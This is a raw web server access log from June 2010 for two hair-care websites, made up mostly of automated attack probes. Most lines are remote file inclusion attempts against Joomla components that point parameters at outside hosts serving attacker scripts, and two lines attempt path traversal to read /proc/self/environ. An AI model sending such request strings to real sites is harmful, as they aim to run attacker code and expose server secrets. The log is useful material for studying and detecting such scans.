74.124.198.60 - - [13/Jun/2010:22:27:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:07 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:27:36 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:27:37 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:29:28 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:29:28 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:29:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:29:38 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:29:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:29:38 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:29:50 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:29:51 -0700] "GET /logs/access_100315.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:29:51 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:29:51 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:30:07 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:30:07 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:30:07 -0700] "GET /logs/access_100322.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:30:39 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
59.21.247.137 - - [13/Jun/2010:22:30:39 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
59.21.247.137 - - [13/Jun/2010:22:30:40 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
59.21.247.137 - - [13/Jun/2010:22:30:48 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
59.21.247.137 - - [13/Jun/2010:22:30:48 -0700] "GET /index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
59.21.247.137 - - [13/Jun/2010:22:30:49 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:31:38 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:31:42 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:31:42 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:31:42 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
193.105.210.165 - - [13/Jun/2010:22:32:16 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
193.105.210.165 - - [13/Jun/2010:22:32:16 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.01" "www.freehairsecrets.com"
74.124.198.60 - - [13/Jun/2010:22:32:18 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:32:40 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:32:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:32:56 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:32:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:14 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:26 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:26 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:26 -0700] "GET /logs/access_100315.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:36 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:36 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:36 -0700] "GET /logs/access_100315.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:44 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:44 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:44 -0700] "GET /logs/access_100503.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:48 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:48 -0700] "GET /logs/access_100503.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:33:48 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:34:05 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:34:06 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:34:30 -0700] "GET /logs/access_100308.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:34:54 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:34:55 -0700] "GET /logs/access_100510.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:35:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:35:04 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:35:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:36:35 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:36:35 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:36:35 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:38:46 -0700] "GET /logs/access_100510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:38:46 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [13/Jun/2010:22:38:46 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.243.67 - - [13/Jun/2010:22:39:22 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.243.67 - - [13/Jun/2010:22:39:25 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:39:34 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
59.21.247.137 - - [13/Jun/2010:22:39:36 -0700] "GET /logs/access_100125.log//index.php?DOCUMENT_ROOT=http://www.badmintonyukon.ca/logs/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
67.195.37.176 - - [13/Jun/2010:22:40:45 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [13/Jun/2010:22:40:45 -0700] "GET /logs/?S=D HTTP/1.0" 200 5927 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:41:18 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:41:18 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:41:19 -0700] "GET /logs/access_091221.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:42:37 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:22:42:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:22:42:38 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.237.135 - - [13/Jun/2010:22:42:38 -0700] "GET /logs/access_100322.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:43:40 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:43:40 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:43:40 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:43:54 -0700] "GET /logs/access_100125.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:43:54 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:43:54 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.237.135 - - [13/Jun/2010:22:45:54 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.54.22.2 - - [13/Jun/2010:22:46:59 -0700] "GET /logs/access_100510.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:46:59 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:47:00 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:47:16 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:47:16 -0700] "GET /logs/access_100510.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.54.22.2 - - [13/Jun/2010:22:47:16 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dong69.co.kr/xe/ganyot/id1.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /logs/access_091026.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.45.45.135 - - [13/Jun/2010:22:48:56 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
